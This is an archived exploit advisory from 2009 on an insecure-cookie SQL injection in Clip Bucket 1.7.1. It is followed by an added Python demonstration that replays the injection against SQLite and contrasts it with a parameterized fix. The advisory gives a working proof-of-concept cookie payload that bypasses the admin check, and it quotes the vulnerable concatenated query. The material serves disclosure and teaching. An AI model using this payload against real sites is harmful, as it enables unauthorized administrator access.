By Qabandi
From Kuwait, PEACE...
iqa[a]hotmail.fr

=Vuln: Clip Bucket <= 1.7.1 Insecure Cookie Handling
=INFO: http://clip-bucket.com/
=BUY: ---
=Download: http://clip-bucket.com/download
=DORK: :)

_-=/:Conditions:\=-_
````````````````````````````````````````````````````````````````````````````````
Magic_quotes MUST BE OFF
(With magic_quotes_gpc enabled, PHP escapes the single quote in the cookie value
as \', the string literal is not closed, and the injection below does not work.)
---------------------------------------===--------------------------------------

_-=/:Vulnerable_Code:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "\includes\classes\user.class.php"
function admin_check(){
    $admin = 'Admin';
    // Only the presence of these cookies is tested; their values are not used below.
    if(isset($_COOKIE['userid']) && isset($_COOKIE['username']) && isset($_COOKIE['session'])) {
        $userid   = @$_SESSION['userid'];
        $username = @$_SESSION['username'];
        // Client-controlled cookie value, concatenated into the query unescaped.
        $session  = @$_COOKIE['PHPSESSID'];
        $query = mysql_query("SELECT * FROM users WHERE level='".$admin."' AND username ='".$username."' AND userid = '".$userid."' AND session='".$session."'");
        if(mysql_num_rows($query)>0){
            $answer = 1;
            return $answer;
        }else{
            $answer = 0;
            return $answer;
        }
    }
}

In the snippet as shown, $userid and $username are read from $_SESSION, and the
only cookie value that reaches the query is $_COOKIE['PHPSESSID']. The query is
built by string concatenation with no escaping or parameter binding, so a single
quote in that value closes the literal and the rest of the value is parsed as SQL.
Any row count above zero makes admin_check() return 1.
---------------------------------------===--------------------------------------

_-=/:P.o.C:\=-_
````````````````````````````````````````````````````````````````````````````````
Set Cookies:
userid=q' or 1='1
username=q' or 1='1
session=q' or 1='1

With the quote unescaped the WHERE clause ends in "or 1='1'", a tautology that
MySQL evaluates as true, so the SELECT returns every row, mysql_num_rows() is
greater than 0, and admin_check() returns 1 without a matching level, username
or session.
---------------------------------------===--------------------------------------

_-=/:SOLUTION:\=-_
````````````````````````````````````````````````````````````````````````````````
nah
(No fix is given by the author. Binding the values as prepared-statement
parameters instead of concatenating them, and not deriving authorization state
from client-controlled cookies, removes the issue.)
---------------------------------------===--------------------------------------

No More Private
Salamz to All Muslim Hackers.
# milw0rm.com [2009-07-24]
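The following is an added example, not code from the advisory or from Clip Bucket. It rebuilds the concatenated query from admin_check() in Python and runs it against an in-memory SQLite table shaped like the advisory's SELECT (the table, column names and sample rows are constructed), beside a parameterized version of the same check. One caveat the runnable part has to respect: the page's payload q' or 1='1 relies on MySQL treating 1='1' as true, whereas SQLite compares an integer literal with a text literal and gets false, so the check that is executed uses the string tautology 'a'='a' and the page's exact payload is only rendered as the resulting SQL string.

```python
"""Cookie-to-SQL injection in admin_check(), replayed against SQLite.

Added example, not code from Clip Bucket or the advisory author. Table name,
columns and sample rows are constructed to match the SELECT in the advisory.
"""
import sqlite3

ADMIN = "Admin"

# Constructed sample data: one Admin-level account and one ordinary user.
SAMPLE_USERS = [
    ("1", "admin", "Admin", "k3n0w9sess"),
    ("2", "bob", "User", "zz81sess"),
]

# The advisory's payload, and the variant the SQLite demo actually executes
# (SQLite evaluates 1='1' as false; MySQL evaluates it as true).
PAGE_PAYLOAD = "q' or 1='1"
DEMO_PAYLOAD = "q' or 'a'='a"


def make_db():
    """In-memory users table shaped like the one the advisory's query reads."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (userid TEXT, username TEXT, level TEXT, session TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def build_vulnerable_query(userid, username, session):
    """Same string concatenation as the PHP admin_check(): no escaping, no binding."""
    return (
        "SELECT * FROM users WHERE level='" + ADMIN + "' AND username ='" + username
        + "' AND userid = '" + userid + "' AND session='" + session + "'"
    )


def admin_check_vulnerable(conn, userid, username, session):
    """Returns 1 if any row matches, as the original does via mysql_num_rows()."""
    rows = conn.execute(build_vulnerable_query(userid, username, session)).fetchall()
    return 1 if rows else 0


def admin_check_fixed(conn, userid, username, session):
    """Hardened form: values are bound as parameters, so quotes stay data."""
    rows = conn.execute(
        "SELECT * FROM users WHERE level=? AND username=? AND userid=? AND session=?",
        (ADMIN, username, userid, session),
    ).fetchall()
    return 1 if rows else 0


def demo():
    """Injected SQL for the page's payload, plus vulnerable vs. fixed results."""
    conn = make_db()
    return {
        # AND binds tighter than OR, so the trailing tautology stands alone and
        # the level='Admin' predicate no longer constrains anything.
        "injected_sql": build_vulnerable_query(PAGE_PAYLOAD, PAGE_PAYLOAD, PAGE_PAYLOAD),
        "vulnerable": admin_check_vulnerable(conn, DEMO_PAYLOAD, DEMO_PAYLOAD, DEMO_PAYLOAD),
        "fixed": admin_check_fixed(conn, DEMO_PAYLOAD, DEMO_PAYLOAD, DEMO_PAYLOAD),
        "legit_admin": admin_check_fixed(conn, "1", "admin", "k3n0w9sess"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

The vulnerable check returns 1 for the injected values while the bound version returns 0 for the same input and still returns 1 for the real admin's userid, username and session, which is the behaviour the original function was supposed to have.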